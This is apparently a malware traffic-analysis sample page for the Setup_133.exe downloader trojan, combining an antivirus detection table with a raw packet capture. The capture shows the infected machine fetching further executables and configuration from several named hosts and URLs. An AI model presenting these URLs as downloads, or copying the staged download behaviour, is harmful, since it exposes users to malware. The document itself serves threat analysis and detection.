Setup_133.exe Trojan Malware xiazai.51jetso.com Downloader Traffic Analysis PCAP file download sample

SHA256: 1bec139d54d147196c4e736d8dcf1f39d2bff390d59d5b240b4a97e03763cf72
File name: Setup_133.exe
Detection ratio: 35 / 52
Analysis date: 2016-10-26 22:22:08 UTC ( 1 minute ago )
Antivirus Result Update
AVG Malware.E52 20161026
AVware Trojan.Win32.Generic!BT 20161026
Ad-Aware Gen:Variant.Application.Bundler.Yantai.1 20161026
AegisLab Troj.W32.Invader!c 20161026
AhnLab-V3 PUP/Win32.Agent.R182507 20161026
Antiy-AVL Trojan/Generic.ASMalwNS.5786 20161026
Arcabit Trojan.Application.Bundler.Yantai.1 20161026
Avast Win32:Malware-gen 20161026
BitDefender Gen:Variant.Application.Bundler.Yantai.1 20161026

 

2016-10-26 01:04:04.255745 IP 192.168.1.102.62261 > 203.130.61.232.80: Flags [P.], seq 0:298, ack 1, win 256, length 298: HTTP: GET /378/Setup_133.exe HTTP/1.1
E..Rs:@……..f..=..5.P[.u<….P…m…GET /378/Setup_133.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: xiazai.51jetso.com
Connection: Keep-Alive

2016-10-26 01:04:04.372018 IP 192.168.1.102.62261 > 203.130.61.232.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {1461:2921}], length 0
E..4s;@……..f..=..5.P[.vf………{…..

E..(D.@……..f.4U..6.P…..?O.P………….
2016-10-26 01:04:10.106007 IP 192.168.1.102.62262 > 23.52.85.163.80: Flags [P.], seq 0:179, ack 1, win 256, length 179: HTTP: GET /pca3.crl HTTP/1.1
E…D.@….L…f.4U..6.P…..?O.P….8..GET /pca3.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

2016-10-26 01:04:14.765747 IP 192.168.1.102.62265 > 220.243.230.247.80: Flags [P.], seq 0:105, ack 1, win 256, length 105: HTTP: GET /soft/kp2configuration.ini HTTP/1.0
E…%.@…N….f…..9.Pw-…5p=P….M..GET /soft/kp2configuration.ini HTTP/1.0
Host: khit.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2016-10-26 01:04:14.851501 IP 192.168.1.102.62265 > 220.243.230.247.80: Flags [.], ack 2921, win 256, length 0
E..(%.@…O=…f…..9.Pw-…5{.P………….
2016-10-26 01:04:14.852081 IP 192.168.1.102.62265 > 220.243.230.247.80: Flags [.], ack 4404, win 256, length 0
E..(%.@…O<…f…..9.Pw-…5.pP………….
2016-10-26 01:04:14.852344 IP 192.168.1.102.62265 > 220.243.230.247.80: Flags [.], ack 4405, win 256, length 0

E..(N.@….G…fx4Yb.:.PW.RI.2fpP…#………
2016-10-26 01:04:32.525522 IP 192.168.1.102.62266 > 120.52.89.98.80: Flags [P.], seq 0:110, ack 1, win 256, length 110: HTTP: GET /interface/mc?mcid=5791 HTTP/1.0
E…N.@……..fx4Yb.:.PW.RI.2fpP….]..GET /interface/mc?mcid=5791 HTTP/1.0
Host: mc.funshion.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2016-10-26 01:04:32.784100 IP 192.168.1.102.62266 > 120.52.89.98.80: Flags [.], ack 745, win 253, length 0
E..(N.@….E…fx4Yb.:.PW.R..2iXP… {……..
2016-10-26 01:04:32.787464 IP 192.168.1.102.62266 > 120.52.89.98.80: Flags [F.], seq 110, ack 745, win 253, length 0
E..(N.@….D…fx4Yb.:.PW.R..2iXP… z……..
2016-10-26 01:04:32.810628 IP 192.168.1.102.60796 > 75.75.75.75.53: 8912+ A? downloads.funshion.net. (40)

E..(.@@…H….fy.Y..;.P…..?+EP…{T……..
2016-10-26 01:04:33.613630 IP 192.168.1.102.62267 > 121.12.89.170.80: Flags [P.], seq 0:141, ack 1, win 256, length 141: HTTP: GET /tools/cloudinstall/7904/FunWeasley_c7904_s.exe HTTP/1.0
E….A@…H=…fy.Y..;.P…..?+EP…K…GET /tools/cloudinstall/7904/FunWeasley_c7904_s.exe HTTP/1.0
Host: downloads.funshion.net
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*